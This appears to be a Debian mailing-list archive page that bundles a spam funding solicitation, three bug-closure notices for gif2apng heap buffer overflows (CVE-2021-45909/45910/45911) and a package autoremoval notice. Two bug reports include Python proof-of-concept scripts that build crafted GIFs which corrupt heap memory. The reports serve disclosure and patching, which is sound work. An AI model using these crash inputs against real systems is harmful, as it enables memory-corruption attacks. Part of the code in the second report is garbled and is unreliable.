Business, August 2022
Hello packa...@qa.debian.org, I am looking to fund a viable business opportunities/projects in your location. I am contacting you with regards to an ongoing project funding program I have affiliations with. Let me know if you're interested so we can establish a business relationship. I await your answer. Cordially, Jimmy Yun Advanced Research Investment Solutions, LLC
Bug#1002687: marked as done (gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of delays in the main function)
Your message dated Sat, 13 Aug 2022 17:02:32 +
with message-id
and subject line Bug#1002687: fixed in gif2apng 1.9+srconly-2+deb10u1
has caused the Debian Bug report #1002687,
regarding gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of
delays in the main function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002687: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002687
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security
Dear Maintainer,
There is a heap based buffer overflow in the main function of the gif2apng
application. The responsible code looks as follows:
delays = (unsigned short *)malloc(frames*2);
if (delays == NULL)
return 1;
[...]
if (val == 0xF9)
{
if (fread(&size, 1, 1, f1) != 1) return 1;
if (fread(&flags, 1, 1, f1) != 1) return 1;
if (fread(&delay, 2, 1, f1) != 1) return 1;
if (fread(&t, 1, 1, f1) != 1) return 1;
if (fread(&end, 1, 1, f1) != 1) return 1;
has_t = flags & 1;
dispose_op = (flags >> 2) & 7;
if (dispose_op > 3) dispose_op = 3;
if (dispose_op == 3 && n == 0) dispose_op = 2;
if (delay > 1) delays[n] = delay;
}
The variable n is used to count the frames. The problem is that if we enter the
if statement at the very end of the gif file, then n is equal to frames. This
means, that the write to the delays buffer overwrites the two bytes after the
delays buffer.
The following script generates a poc.gif file, that should cause a crash:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
sig = b"GIF87a"
w = b"\x10\x00"
h = b"\x10\x00"
flags_one = b"\x00"
bcolor = b"\x01"
aspect = b"\x01"
data = sig + w + h + flags_one + bcolor + aspect
f.write(data)
# Writting more frames to produce crash:
for i in range(0,28):
# Going into the id 0x2c path, so that there is a frame
id = b"\x2c"
w0 = b"\x01\x00"
y0 = b"\x00\x00"
x0 = b"\x00\x00"
h0 = b"\x01\x00" # Getting past our own size checks
flags_two = b"\x00"
data = id + x0 + y0 + w0 + h0 + flags_two
f.write(data)
# DecodeLZW
mincode = b"\x07"
f.write(mincode)
for i in range(0,512):
# Size value and byte we write to the heap
target_char = b"\x01" + b"A"
f.write(target_char)
# Resetting the values using "clearcode" to keep the code path as
simple as possible
clear_code = b"\x01" + b"\x80"
f.write(clear_code)
# Leaving function
target_char = b"\x00"
f.write(target_char)
# Triggering the vulnerable code path
id = b"\x21"
val = b"\xf9"
size = b"\xff"
flags_two = b"\x00"
delay = b"\xff\xff"
t = b"\x00"
end = b"\x00"
data = id + val + size + flags_two + delay + t + end
f.write(data)
# Breaking out of while loop
f.write(b"")
f.close()
The generated poc.gif file causes a memory curruption on the heap when
converted with the current gif2apng version:
$ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif'...
28 frames.
Writing 'poc.png'...
28 frames.
munmap_chunk(): invalid pointer
Abgebrochen
This buffer overflow allows an attacker to write two arbitrary bytes after the
delays buffer.
I did a rudimentary fix in my local version of the program by adding a boundary
check to the if statement in the code:
if (val == 0xF9)
{
if (fread(&size, 1, 1, f1) != 1) return 1;
if (fread(&flags, 1, 1, f1) != 1) return 1;
if (fread(&delay, 2, 1, f1) != 1) return 1;
if (fread(&t, 1, 1, f1) != 1) return 1;
if (fread(&end, 1, 1, f1) != 1) return 1;
has_t = flags & 1;
dispose_op = (flags >> 2) & 7;
if (dispose_op > 3) dispose_op = 3;
if (dispose_op == 3 && n == 0) dispose_op = 2;
if (delay > 1 && n < frames) {
delays[n] = delay;
}
}
This fixed the crash for me locally. However I am not sure if this is a clean
solution as I have no idea if this can happen in a valid image. If this code
path is not possible in a valid image it might be better to stop processing the
image at this point.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores
Bug#1002667: marked as done (gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function)
Your message dated Sat, 13 Aug 2022 17:02:32 +
with message-id
and subject line Bug#1002667: fixed in gif2apng 1.9+srconly-2+deb10u1
has caused the Debian Bug report #1002667,
regarding gif2apng: CVE-2021-45910: Heap based buffer overflow in the main
function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002667: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002667
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security
Dear Maintainer,
I found a heap overflow in the main function of the gif2apng application. The
issue exists within the for loops in the following code from the main function
in gif2apng.cpp:
if (coltype == 2)
{
for (j=0; jh2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + ((k+y0)*w + x0)*3;
for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + (k+y0)*w + x0;
if (shuffle)
{
for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + ((k+y0)*w + x0)*3;
if ( ( (j*w0 + w0) > buffer_size) || ( k+y0)*w + x0)*3) + w0
* 3 ) > imagesize) || k+y0)*w + x0)*3) < 0 ) || ( (j*w0) < 0)) {
printf("Something is wrong with the size values\n");
exit(0);
}
for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ?
(j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8;
src = buffer + j*w0;
dst = frame0 + (k+y0)*w + x0;
if ( ( (j*w0 + w0) > buffer_size) || ( (((k+y0)*w + x0) + w0 ) >
imagesize) || k+y0)*w + x0)) < 0 ) || ( (j*w0) < 0)) {
printf("Something is wrong with the size values\n");
exit(0);
}
if (shuffle)
{
for (i=0; i
-- no debconf information
--- End Message ---
--- Begin Message ---
Source: gif2apng
Source-Version: 1.9+srconly-2+deb10u1
Done: Håvard F. Aasen
We believe that the bug you reported is fixed in the latest version of
gif2apng, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1002...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Håvard F. Aasen (supplier of updated gif2apng package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Format: 1.8
Date: Thu, 28 Jul 2022 23:56:21 +0200
Source: gif2apng
Architecture: source
Version: 1.9+srconly-2+deb10u1
Distribution: buster
Urgency: medium
Maintainer: Khalid El Fathi
Changed-By: Håvard F. Aasen
Closes: 1002667 1002668 1002687
Changes:
gif2apng (1.9+srconly-2+deb10u1) buster; urgency=medium
.
* Non-maintainer upload.
* CVE-2021-45909, Closes: #1002668:
heap based buffer overflow in the DecodeLZW
* CVE-2021-45910, Closes: #1002667:
heap-based buffer overflow within the main function
* CVE-2021-45911, Closes: #1002687:
heap based buffer overflow in processing of delays in the main function
Checksums-Sha1:
77391152adfba90edcfa8e747769bcf09a62b876 2009
gif2apng_1.9+srconly-2+deb10u1.dsc
f184e5ccbdbc49945f5af571fc2b3b00b74a316b 8916
gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz
b100032d2b6efbc6fbde9adcc696b1e5bc9fa5f1 5441
gif2apng_1.9+srconly-2+deb10u1_source.buildinfo
Checksums-Sha256:
ba13882e087d8f431366087ad820d514f51c5124d45195bdc7e247c857232482 2009
gif2apng_1.9+srconly-2+deb10u1.dsc
88ef009c78679146033f91d3b6c1c3bf0d46b0674b97b076abe6ccf2f4f1 8916
gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz
8afc7fb97cab9db5e611ecbff73f5ae57a9000cfbe7f69d73b4d5f39d6c5a86f 5441
gif2apng_1.9+srconly-2+deb10u1_source.buildinfo
Files:
39effd0d93ec256fc220da6a17a78892 2009 graphics optional
gif2apng_1.9+srconly-2+deb10u1.dsc
d281aa7b5ed1745ad760c17582cc8c07 8916 graphics optional
gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz
7442a9a2d9a4874284a6d246af137e9f 5441 graphics optional
gif2apng
Bug#1002668: marked as done (gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function)
Your message dated Sat, 13 Aug 2022 17:02:32 +
with message-id
and subject line Bug#1002668: fixed in gif2apng 1.9+srconly-2+deb10u1
has caused the Debian Bug report #1002668,
regarding gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW
function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002668: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002668
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security
Dear Maintainer,
There is a heap based buffer overflow in the gif2apng package. The
vulnerability is located in the DecodeLZW function in the gif2apng.cpp file.
The problem here is, that this function writes to a buffer, that was allocated
using malloc without checking the size of this buffer. Therefore it is possible
to provide a gif to the program, that contains more data than fits into this
buffer leading to a memory corruption on the heap. I wrote the following poc
script in python:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" *
9
f.write(beginning)
# Value needed in the vulnerable function
mincode = b"\x07"
f.write(mincode)
for i in range(0,1):
# Size value and byte we write to the heap
target_char = b"\x01" + b"A"
f.write(target_char)
# Resetting the values using "clearcode" to keep the code path as simple
as possible
clear_code = b"\x01" + b"\x80"
f.write(clear_code)
f.close()
This script creates a file called poc.gif, which writes 1 "A"'s into a
buffer of size 512 leading to memory corruption on the heap. I tested this on
Debian 10 using the current version of the package from the testing repository
and got the following output:
$ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif'...
1 frames.
malloc(): corrupted top size
Abgebrochen
This vulnerability seems to allow a write of an arbitrary number of arbitrary
bytes. Therefore I think it likely, that this could be exploited.
To fix this issue locally I added a buffer_size variable to the main function,
which holds the size of the allocated buffer (the imagesize value used
initially for the allocation was overwritten at some point). I then passed this
value to the DecodeLZW function and added two if-statements around the writes
to the the buffer to check whether the buffer can hold more bytes. My code
looks as follows:
void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added
parameter img_size
{
unsigned int bytes_written = 0;
[...]
if (lastcode == -1)
{
if (bytes_written < img_size) { // Added if-statement
*pout++ = suffix[code];
bytes_written++;
}
else {
printf("Invalid image size\n");
exit(0);
}
firstchar = lastcode = code;
continue;
}
[...]
do
{
if (bytes_written < img_size) { // Added if-statement
*pout++ = *--pstr;
bytes_written++;
}
else {
printf("Invalid image size\n");
exit(0);
}
}
while (pstr > str);
[...]
int main(int argc, char** argv)
{
unsigned int buffer_size = 0; // New variable to hold the size of the
buffer
[...]
grayscale = 1;
buffer_size = imagesize*2; // New variable, as imagesize is overwritten
at some point
buffer = (unsigned char *)malloc(buffer_size);
if (buffer == NULL)
{
printf("Error: not enough memory\n");
return 1;
}
[...]
DecodeLZW(buffer, buffer_size, f1); // Added buffer_size
[...]
DecodeLZW(buffer, buffer_size, f1); // Added Buffer size
[...]
This compiled successfully and fixed the buffer overflow for me. I am however
not sure if this is the cleanest way to fix the issue and it could use some
more testing.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE=de_DE.U
centreon-clib is marked for autoremoval from testing
centreon-clib 21.04.2-1 is marked for autoremoval from testing on 2022-08-26 It is affected by these RC bugs: 1012902: centreon-clib: ftbfs with GCC-12 https://bugs.debian.org/1012902 This mail is generated by: https://salsa.debian.org/release-team/release-tools/-/blob/master/mailer/mail_autoremovals.pl Autoremoval data is generated by: https://salsa.debian.org/qa/udd/-/blob/master/udd/testing_autoremovals_gatherer.pl
